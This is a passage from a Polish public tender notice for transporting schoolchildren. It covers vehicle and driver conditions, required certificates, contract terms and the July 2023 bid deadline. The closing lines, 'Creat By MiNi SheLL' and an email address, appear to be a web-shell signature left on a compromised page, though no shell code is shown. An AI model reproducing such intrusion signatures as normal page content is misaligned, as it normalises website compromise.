potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - wzór stanowi załącznik nr 8 SWZ, stanowiący również załącznik do formularza ofertowego<br/>2.	Warunek w zakresie potencjału technicznego:<br/>Wykonawca wykaże, że dysponuje odpowiednimi środkami transportu, 4 pojazdami przystosowanymi do bezpiecznego przewozu dzieci, młodzieży i opiekunów, wyposażonymi: I pojazd - minimum 41 miejsca siedzące, II pojazd - minimum 54 miejsc siedzących, III pojazd - minimum 26 miejsca siedzące, IV pojazd - minimum 26 miejsca siedzące. Warunki przewozu uczniów powinny być zorganizowane zgodnie z przepisami ustawy z dnia 6 września 2001r. o transporcie drogowym. Każdy środek transportu musi posiadać aktualne badania techniczne, ubezpieczenie OC.<br/>W przypadku wspólnego ubiegania się o zamówienie dwóch lub więcej wykonawców, warunek ten można spełniać łącznie.<br/>3.	Warunek dotyczący osób skierowanych do realizacji zamówienia:<br/>Wykonawca wykaże, że dysponuje osobami posiadającymi odpowiednie kwalifikacje zawodowe skierowanymi do realizacji zamówienia tj.:<br/>a)	Kierowcy, posiadający odpowiednie kwalifikacje zawodowe do kierowania pojazdami umożliwiającymi realizację zamówienia, określone w art. 39a ustawy z dnia <br/>06 września 2001 r. o transporcie drogowym (tj. Dz. U. z 2022 r. poz. 2201) – minimum 4 osoby. <br/>W przypadku wspólnego ubiegania się o zamówienie dwóch lub więcej wykonawców, warunek ten można spełniać łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, czyli środków służących potwierdzeniu braku podstaw wykluczenia, spełniania warunków udziału w postępowaniu lub kryteriów selekcji.<br/>2.	W ramach podmiotowych środków dowodowych zamawiający żąda złożenia przez wykonawców na wykazanie spełnienia warunku (zgodnie z art. 112 ust. 2 pkt 1–4 PZP.):<br/>1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej, wzór oświadczenia stanowi załącznik nr 5 do SWZ.<br/>2)	Zezwolenia (licencji) do wykonywania na terenie Polski transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym oraz z ustawą z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz.U. z 2021 r. poz. 450).<br/>3)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego o nie zaleganiu z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.<br/>4)	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymane w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.<br/>5) Aktualne zaświadczenie o niezaleganiu z podatkami lokalnymi na rzecz administracji samorządowej. Zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed datą złożenia oferty.<br/>6)	wykazu kierowców, którzy będą realizować przedmiot zamówienia, skierowanych przez wykonawcę do realizacji zamówienia publicznego – załącznik nr 6 SWZ<br/>7)	wykaz narzędzi (środków transportu – pojazdów) dostępnych wykonawcy w celu realizacji zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami, wzór wykazu narzędzi (środków transportu – pojazdów) stanowi załącznik nr 7 do SWZ;<br/>8)	Wykaz wykonanej usługi, <br/>9)	Kopia polisy ubezpieczeniowej OC pojazdów realizujących przedmiot zamówienia.<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie w sposób należyty wykonał lub wykonuje co najmniej 1 usługę polegającą na transporcie uczniów do szkół podstawowych trwającą minimum 6 miesięcy, o łącznej wartości nie mniejszej niż 30 000,00 zł brutto, oraz z załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - wzór stanowi załącznik nr 8 SWZ, stanowiący również załącznik do formularza ofertowego; wzór stanowi załącznik nr 8 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, czyli środków służących potwierdzeniu braku podstaw wykluczenia, spełniania warunków udziału w postępowaniu lub kryteriów selekcji.<br/>2.	W ramach podmiotowych środków dowodowych zamawiający żąda złożenia przez wykonawców na wykazanie spełnienia warunku (zgodnie z art. 112 ust. 2 pkt 1–4 PZP.):<br/>1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej, wzór oświadczenia stanowi załącznik nr 5 do SWZ.<br/>2)	Zezwolenia (licencji) do wykonywania na terenie Polski transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym oraz z ustawą z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz.U. z 2021 r. poz. 450).<br/>3)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego o nie zaleganiu z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.<br/>4)	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymane w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.<br/>5) Aktualne zaświadczenie o niezaleganiu z podatkami lokalnymi na rzecz administracji samorządowej. Zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed datą złożenia oferty.<br/>6)	wykazu kierowców, którzy będą realizować przedmiot zamówienia, skierowanych przez wykonawcę do realizacji zamówienia publicznego – załącznik nr 6 SWZ<br/>7)	wykaz narzędzi (środków transportu – pojazdów) dostępnych wykonawcy w celu realizacji zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami, wzór wykazu narzędzi (środków transportu – pojazdów) stanowi załącznik nr 7 do SWZ;<br/>8)	Wykaz wykonanej usługi, <br/>9)	Kopia polisy ubezpieczeniowej OC pojazdów realizujących przedmiot zamówienia.<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie w sposób należyty wykonał lub wykonuje co najmniej 1 usługę polegającą na transporcie uczniów do szkół podstawowych trwającą minimum 6 miesięcy, o łącznej wartości nie mniejszej niż 30 000,00 zł brutto, oraz z załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - wzór stanowi załącznik nr 8 SWZ, stanowiący również załącznik do formularza ofertowego; wzór stanowi załącznik nr 8 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający wzywa do ich złożenia lub uzupełnienia w terminie 5 dni.<br/>2.	Nie wzywa się Wykonawcy do uzupełnienia przedmiotowych środków dowodowych, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>3.	Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>4.	Wykonawca składa na wezwanie następujące przedmiotowe środki dowodowe:<br/>a.	Dowody rejestracyjne pojazdów, z wykorzystaniem których Wykonawca będzie realizował przedmiot zamówienia (kserokopia/skan potwierdzona za zgodność z oryginałem). Dowody rejestracyjne pojazdów mają na celu potwierdzenie aktualności badań technicznych oraz roku produkcji każdego z pojazdów.<br/>5.	Wykonawca ma obowiązek złożyć dokumenty w tej samej formie co ofertę.<br/>6.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a.	Dowody rejestracyjne pojazdów, z wykorzystaniem których Wykonawca będzie realizował przedmiot zamówienia (kserokopia/skan potwierdzona za zgodność z oryginałem). Dowody rejestracyjne pojazdów mają na celu potwierdzenie aktualności badań technicznych oraz roku produkcji każdego z pojazdów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy w odniesieniu do warunków, które zostały opisane pkt 5 SWZ – zgodnie z treścią Formularza ofertowego<br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>W przypadku gdy oświadczenie zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, a w przypadku postępowań lub konkursów, o wartości mniejszej niż progi unijne, kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia lub notariusz <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy może nastąpić w przypadkach określonych w art. 439 ust. 1PZP <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-10 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com